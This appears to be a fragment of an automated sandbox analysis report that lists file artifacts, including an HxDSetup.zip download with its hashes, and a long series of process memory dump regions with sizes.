C:\Users\Admin\AppData\Roaming\Microsoft\Spelling\en-US\default.dic

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\Downloads\HxDSetup.zip

Filesize
3.2MB

MD5
8197454e020b2622a1356abab39f9408

SHA1
d0d69744f1d01353507bc090ff79fb45db6882c0

SHA256
5065041c7b03c24b9533a5b32b33db58f2b4924cd84bed41834ff2db51c1cb7c

SHA512
ea97d98877342d725adcbfa075d5d5770470cf4a1d79477d577d299b6298d62f9a7fec8903633f8adcda7d306bff848751f8c788b611cc2d1074624a9153bc49

Download Submit
memory/1324-1745-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/1324-1854-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/3380-391-0x00007FF8F36B0000-0x00007FF8F3A29000-memory.dmp

Filesize
3.5MB

Download
memory/3380-62-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp

Filesize
1.5MB

Download
memory/3380-26-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp

Filesize
4.4MB

Download
memory/3380-268-0x00007FF8FD600000-0x00007FF8FD60D000-memory.dmp

Filesize
52KB

Download
memory/3380-311-0x00007FF8F7F90000-0x00007FF8F7FBE000-memory.dmp

Filesize
184KB

Download
memory/3380-249-0x00007FF8F9970000-0x00007FF8F9989000-memory.dmp

Filesize
100KB

Download
memory/3380-313-0x00007FF8F3A30000-0x00007FF8F3AE8000-memory.dmp

Filesize
736KB

Download
memory/3380-314-0x000002C89B380000-0x000002C89B6F9000-memory.dmp

Filesize
3.5MB

Download
memory/3380-325-0x00007FF8F36B0000-0x00007FF8F3A29000-memory.dmp

Filesize
3.5MB

Download
memory/3380-332-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp

Filesize
124KB

Download
memory/3380-328-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp

Filesize
144KB

Download
memory/3380-333-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp

Filesize
1.5MB

Download
memory/3380-327-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp

Filesize
4.4MB

Download
memory/3380-361-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp

Filesize
4.4MB

Download
memory/3380-141-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp

Filesize
124KB

Download
memory/3380-379-0x00007FF8F8120000-0x00007FF8F814C000-memory.dmp

Filesize
176KB

Download
memory/3380-100-0x00007FF8DD9F0000-0x00007FF8DDB08000-memory.dmp

Filesize
1.1MB

Download
memory/3380-33-0x00007FF8FD970000-0x00007FF8FD97F000-memory.dmp

Filesize
60KB

Download
memory/3380-390-0x00007FF8DD9F0000-0x00007FF8DDB08000-memory.dmp

Filesize
1.1MB

Download
memory/3380-72-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp

Filesize
4.4MB

Download
memory/3380-79-0x00007FF8F7F70000-0x00007FF8F7F85000-memory.dmp

Filesize
84KB

Download
memory/3380-80-0x00007FF8F7F60000-0x00007FF8F7F6D000-memory.dmp

Filesize
52KB

Download
memory/3380-75-0x00007FF8F36B0000-0x00007FF8F3A29000-memory.dmp

Filesize
3.5MB

Download
memory/3380-76-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp

Filesize
144KB

Download
memory/3380-73-0x00007FF8F3A30000-0x00007FF8F3AE8000-memory.dmp

Filesize
736KB

Download
memory/3380-74-0x000002C89B380000-0x000002C89B6F9000-memory.dmp

Filesize
3.5MB

Download
memory/3380-68-0x00007FF8F7F90000-0x00007FF8F7FBE000-memory.dmp

Filesize
184KB

Download
memory/3380-66-0x00007FF8FD600000-0x00007FF8FD60D000-memory.dmp

Filesize
52KB

Download
memory/3380-64-0x00007FF8F9970000-0x00007FF8F9989000-memory.dmp

Filesize
100KB

Download
memory/3380-225-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp

Filesize
1.5MB

Download
memory/3380-60-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp

Filesize
124KB

Download
memory/3380-398-0x00007FF8F3A30000-0x00007FF8F3AE8000-memory.dmp

Filesize
736KB

Download
memory/3380-58-0x00007FF8FD950000-0x00007FF8FD968000-memory.dmp

Filesize
96KB

Download
memory/3380-56-0x00007FF8F8120000-0x00007FF8F814C000-memory.dmp

Filesize
176KB

Download
memory/3380-397-0x00007FF8F7F90000-0x00007FF8F7FBE000-memory.dmp

Filesize
184KB

Download
memory/3380-396-0x00007FF8FD600000-0x00007FF8FD60D000-memory.dmp

Filesize
52KB

Download
memory/3380-395-0x00007FF8F9970000-0x00007FF8F9989000-memory.dmp

Filesize
100KB

Download
memory/3380-394-0x00007FF8F4160000-0x00007FF8F42DA000-memory.dmp

Filesize
1.5MB

Download
memory/3380-393-0x00007FF8F9BB0000-0x00007FF8F9BCF000-memory.dmp

Filesize
124KB

Download
memory/3380-392-0x00007FF8FD950000-0x00007FF8FD968000-memory.dmp

Filesize
96KB

Download
memory/3380-389-0x00007FF8F7F60000-0x00007FF8F7F6D000-memory.dmp

Filesize
52KB

Download
memory/3380-388-0x00007FF8F7F70000-0x00007FF8F7F85000-memory.dmp

Filesize
84KB

Download
memory/3380-378-0x00007FF8FD970000-0x00007FF8FD97F000-memory.dmp

Filesize
60KB

Download
memory/3380-377-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp

Filesize
144KB

Download
memory/3380-376-0x00007FF8F3AF0000-0x00007FF8F3F56000-memory.dmp

Filesize
4.4MB

Download
memory/3380-31-0x00007FF8FD9A0000-0x00007FF8FD9C4000-memory.dmp

Filesize
144KB

Download
memory/3900-81-0x000001A237800000-0x000001A237822000-memory.dmp

Filesize
136KB

Download
memory/4364-264-0x00000186FB5C0000-0x00000186FB5C8000-memory.dmp

Filesize
32KB

Download
memory/4888-481-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-486-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-487-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-490-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-479-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-485-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-489-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-488-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-491-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/4888-480-0x000001D1EB740000-0x000001D1EB741000-memory.dmp

Filesize
4KB

Download
memory/5444-1855-0x0000000000400000-0x000000000052E000-memory.dmp

Filesize
1.2MB

Download